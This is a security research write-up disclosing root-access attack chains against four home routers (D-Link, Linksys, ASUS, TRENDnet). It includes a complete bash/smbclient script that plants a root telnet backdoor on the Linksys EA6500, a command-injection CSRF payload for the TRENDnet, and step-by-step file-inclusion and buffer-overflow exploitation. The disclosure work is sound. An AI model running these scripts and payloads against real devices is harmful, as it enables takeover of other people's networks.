Summary

The following table summarizes the services that are available on the (wireless) LAN by default, once USB storage is attached.

    Table 1. Network port summary

The table in Table 2 shows a list of routers evaluated in our study with the specific vulnerabilities that were leveraged to gain root access to the device. These vulnerabilities were found from a hardened configuration, and after USB storage was attached to the device. This chart is not inclusive of all discovered vulnerabilities - only vulnerabilities that were used by ISE to gain root access.

    Table 2. Vulnerability summary

Proof of concept attacks

Here we present several proof of concept attacks that demonstrate how these routers can be exploited using combinations of the above vulnerabilities. We assume the adversary is any user on the (wireless) LAN who can contact the router, and that the router is in its hardened state, with USB storage attached.

D-Link DIR-865L

In the case of the D-Link DIR-865L, we demonstrate how improper file permissions, unsecured sensitive data, unauthenticated access to SMB, and a misconfigured SMB service can allow an attacker to recover the device's administrative password, and thereby gain administrative control of the device.

From its hardened state, with USB storage attached, the DIR-865L runs a Samba service on ports TCP/445 , TCP/139 and UDP/137.

1. By default, the SMB service does not require authentication, and so an attacker can immediately log in without credentials (no CVE cataloged).
2. Due to a misconfiguration in the SMB service, symbolic links can be created to locations outside of the Samba share (CVE-2013-4855). The attacker can create a symbolic link to /, the router's file system root.
3. The DIR-865L allows world-readable access to several system folders (CVE pending), including /var/, which contains the passwd file. Through a symbolic link traversal from 2, an attacker can obtain this file.
4. The DIR-865L passwd file contains a cleartext administrator password (CVE pending). Once the attacker obtains this from 3, he can log in to the web interface as an administrator.
5. The attacker logs in using the credentials obtained in 4.
6. The web interface of the DIR-865L contains a PHP File Inclusion vulnerability (CVE-2013-4857) in the router_info.xml file. The file takes the argument .section. that is intended for including other XML files. An attacker can upload a file containing chosen PHP code to the Samba share (e.g., /tmp/storage/<sharename>/test.xml), and then request router_info.xml while setting the section variable to .../../tmp/storage/<sharename>/<uploaded_file>. which is automatically concatenated with the extension ..xml. and processed.
7. When the DIR-865L receives certain configuration changes through the web interface, it creates shell scripts in the directory /var/run/ and then executes them as a separate step, creating a race condition (no CVE cataloged, not intrinsically a vulnerability). For instance, a command can be issued from the web interface to restart NTP, which creates the script /var/run/ntp_run.sh, and then subsequently executes the script. An attacker can leverage the PHP file inclusion vulnerability from 6 to repeatedly execute PHP code to overwrite /var/run/ntp_run.sh with a different script, while at the same time restarting the NTP service in the hopes of exploiting the race condition, and executing the attacker written ntp_run.sh, rather than the official version.
8. Eventually, winning the race condition from 7 happens, and an unauthenticated Telnet service with root privileges listens on port 23. The attacker can access this service to obtain a root shell.

A full script for launching this attack against a D-Link DIR-865L can be found here.

Linksys EA6500

In the case of the Linksys EA6500, we demonstrate how improper file permissions, unauthenticated access to SMB, and a misconfigured SMB can allow an attacker to execute arbitrary commands on the router, thereby granting the attacker a root shell.

From its hardened state, with USB storage attached, the EA6500 runs a Samba service on ports TCP/445, TCP/139 and UDP/137, UDP/138.

1. By default, the SMB service does not require authentication, and so an attacker can immediately log in without credentials (no CVE cataloged).
2. Due to a misconfiguration in the SMB service, symbolic links can be created to locations outside of the Samba share (CVE-2013-4658) The attacker can create a symbolic link to /, the router's file system root.
3. The EA6500 allows universal read/write access to its /tmp/ directory (CVE pending), where it stores scripts that run according to a cron schedule. Once per minute, the EA6500 runs the scripts found in the folder /tmp/cron/cron.everyminute/ as root. Through the symbolic link traversal from 2, the attacker can put an utelnetd binary in /tmp/, and a script that runs utelnetd in /tmp/cron/cron.everyminute/.
4. Eventually, the script from 3 is activated, and an unauthenticated Telnet service with root privileges listens on port 23. The attacker can access this service to obtain a root shell.

A full script for launching this attack against a hardened EA6500 with USB attached storage can be found below.

#!/bin/bash
cat > activate.sh <<\EOF
#!/bin/sh
/tmp/utelnetd -l /bin/sh
EOF
smbclient '//192.168.1.1/sda1' -N <<\EOF
posix
symlink / root
cd root/tmp/
put utelnetd
chmod 755 utelnetd
cd cron/
rename cron.everyminute cron.old
mkdir cron.everyminute
cd cron.everyminute
put activate.sh
chmod 755 activate.sh
exit
EOF
rm -rf activate.sh
echo 'Waiting for 60 seconds.....\n'
sleep 60
exec telnet 192.168.1.1

ASUS RT-AC66U

For the ASUS RT-AC66U, we demonstrate how insufficient bounds checking and the inability to disable network services allowed us to execute arbitrary code with the same permissions as the vulnerable application.

From its hardened state, with or without USB storage attached, the RT-AC66U runs an ACSD system configuration service on port TCP/5916

1. The ACSD service runs by default, and cannot be disabled (no CVE cataloged).
2. The ACSD service is vulnerable to multiple buffer overflow attacks during the command processing routine (CVE-2013-4659). An attacker can connect to the ACSD service and submit a command string that is larger than the program's fixed length buffer, corrupt the call stack, and change the execution flow of the program by overwriting adjacent memory. The result is the execution of attacker-controlled code.

For the attack to succeed we utilize return oriented programming (ROP) to avoid stack randomization and MIPS system cache incoherency. In order to create a coherent data cache, our payload utilizes a call to a blocking function, sleep(), which effectively pauses program execution and gives CPU cycles to other executing system processes. When the sleep() function returns, the MIPS CPU flushes the data cache and continues program execution. Finally, we direct the programs execution to our custom shellcode that starts an unauthenticated Telnet server by calling the system() function located in the standard C library.

A full script for launching this attack against an ASUS AC66U can be found here.

TRENDnet TEW-812DRU

For the TRENDnet TEW-812DRU, we demonstrate how vulnerabilities in web applications could lead to a direct compromise of the underlying operating system. For this attack, we demonstrate how insufficient input sanitization and lack of CSRF protection could allow an attacker to execute arbitrary system commands with the same permissions as the vulnerable web application.

From its hardened state, with or without USB storage attached, the TRENDnet TEW-812DRU contains a web server on port TCP/80 that serves a web application for configuration purposes.

1. 1. The web server running on TCP/80 runs by default and cannot be disabled by an administrator (no CVE cataloged).
   2. The TEW-812DRU web interface is susceptible to CSRF attacks (CVE pending). A remote attacker can construct a CSRF exploit that causes chosen actions to be performed on behalf of the administrator.
   3. The web application served by the TEW-812DRU's web server is vulnerable to multiple command injection attacks (CVE-2013-3365) during the process of performing configuration updates. An attacker with access to these pages can inject commands into the pages shown in the table below, which are executed when the input is sent to the server.

    Table 3.TEW-812DRU injection points

1. 1. Leveraging the CSRF vulnerability in 2, and the command injection vulnerability in 3, an attacker can execute arbitrary commands on the TEW-812DRU. For instance, an attacker can submit the following HTML as part of a CSRF attack:

      <input type="hidden" name="NtpDstEnd" value="
      `count=0;
      while [ $count -le 25 ];
      do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;
      (( count++ ));
      done;`
      ">
      

1. After the attack in 4, the TEW-812DRU will have started the router's Telnet daemon and made it accessible from the WAN on TCP/23. The attacker can now access this port to obtain a super user system shell.

The full attack script is given here